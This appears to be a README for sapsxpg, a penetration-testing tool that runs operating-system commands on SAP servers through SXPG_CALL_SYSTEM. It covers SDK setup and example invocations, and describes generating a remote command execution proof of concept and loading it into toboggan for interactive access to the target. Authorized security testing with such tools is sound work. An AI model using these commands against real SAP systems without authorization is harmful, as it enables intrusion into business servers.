Simplifying the usage of the SXPG_CALL_SYSTEM function module (FM) on an SAP server, with logging.
The NWRFCSDK is proprietary SAP software, not open source. It requires an S-User account and specific permissions to download. Since SAP owns the intellectual property, it cannot be published or included inside this repository.
- Visit the SAP Support Portal.
- Download the appropriate version for your operating system.
- Follow the installation guide.
If you already have nwrfcsdk somewhere on your system, you can find it in a Linux environment with:
find /opt /home /usr/local /srv -type d -path "*/nwrfcsdk" -print -quit 2>/dev/null
It will give you a path. Use it to export the two mandatory variables:
NWRFCSDK_PATH=$(find /opt /home /usr/local /srv -type d -path "*/nwrfcsdk" -print -quit 2>/dev/null | head -1)
export SAPNWRFC_HOME=$NWRFCSDK_PATH
# Prepend the SDK lib directory without a trailing colon: an empty LD_LIBRARY_PATH entry makes the loader search the current directory
export LD_LIBRARY_PATH="$NWRFCSDK_PATH/lib${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}"

pipx install 'sapsxpg@git+https://github.com/n3rada/sapsxpg.git'

sapsxpg 'aw01585632.aws.sap-noprod.example.com' 'SAPTEST' 'P@ass!w0rd/7'

If the underlying system contains a command that allows you to execute commands on the remote system, you can connect it with toboggan. First, generate the Remote Command Execution (RCE) proof of concept (PoC) with:
sapsxpg 'aw01585632.aws.sap-noprod.example.com' 'SAPTEST' 'P@ass!w0rd/7' --rce-poc "ZSH"
It will generate a file named poc_aw01585632.aws.sap-noprod.example.com_ZSH.py. Plug it into toboggan:
toboggan -m poc_aw01585632.aws.sap-noprod.example.com_ZSH.py

This tool is intended for use in legal penetration testing, Capture The Flag (CTF) competitions, or other authorized and ethical security assessments.
Unauthorized use of this tool on systems you do not own or without proper authorization may be illegal. Please use it responsibly and in compliance with applicable laws and regulations.
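
For the NWRFCSDK environment setup described earlier, the following is an added example (not part of the sapsxpg repository) that wraps the find and export steps in one function and validates the result before touching the environment. The function name, its return codes and the writable-directory check are assumptions of this example; `lib/libsapnwrfc.so` is the SDK's shared library on Linux.

```sh
# Added example, not from the sapsxpg repository. Source this file, then run:
#   setup_nwrfcsdk             # default roots, same as the find command above
#   setup_nwrfcsdk /opt/sap    # hypothetical custom search root
# Return codes (chosen for this example): 1 SDK not found, 2 SDK incomplete,
# 3 lib directory writable by group or others.
setup_nwrfcsdk() {
    [ "$#" -gt 0 ] || set -- /opt /home /usr/local /srv

    # First directory named nwrfcsdk under the search roots (GNU find).
    _sdk=$(find "$@" -type d -path "*/nwrfcsdk" -print -quit 2>/dev/null) || true
    if [ -z "$_sdk" ]; then
        echo "nwrfcsdk not found under: $*" >&2
        return 1
    fi

    # A usable Linux SDK contains lib/libsapnwrfc.so.
    if [ ! -f "$_sdk/lib/libsapnwrfc.so" ]; then
        echo "$_sdk/lib/libsapnwrfc.so is missing" >&2
        return 2
    fi

    # Every program started from this shell searches LD_LIBRARY_PATH for its
    # libraries, so refuse a directory that other accounts can write to.
    # In the ls -ld mode string, column 6 is group write, column 9 other write.
    case "$(ls -ld "$_sdk/lib")" in
        ?????w*|????????w*)
            echo "$_sdk/lib is group- or world-writable" >&2
            return 3
            ;;
    esac

    export SAPNWRFC_HOME="$_sdk"
    # Prepend without leaving an empty entry: the dynamic loader treats an
    # empty LD_LIBRARY_PATH element as the current working directory.
    export LD_LIBRARY_PATH="$_sdk/lib${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}"
    echo "Using NW RFC SDK at $_sdk"
}
```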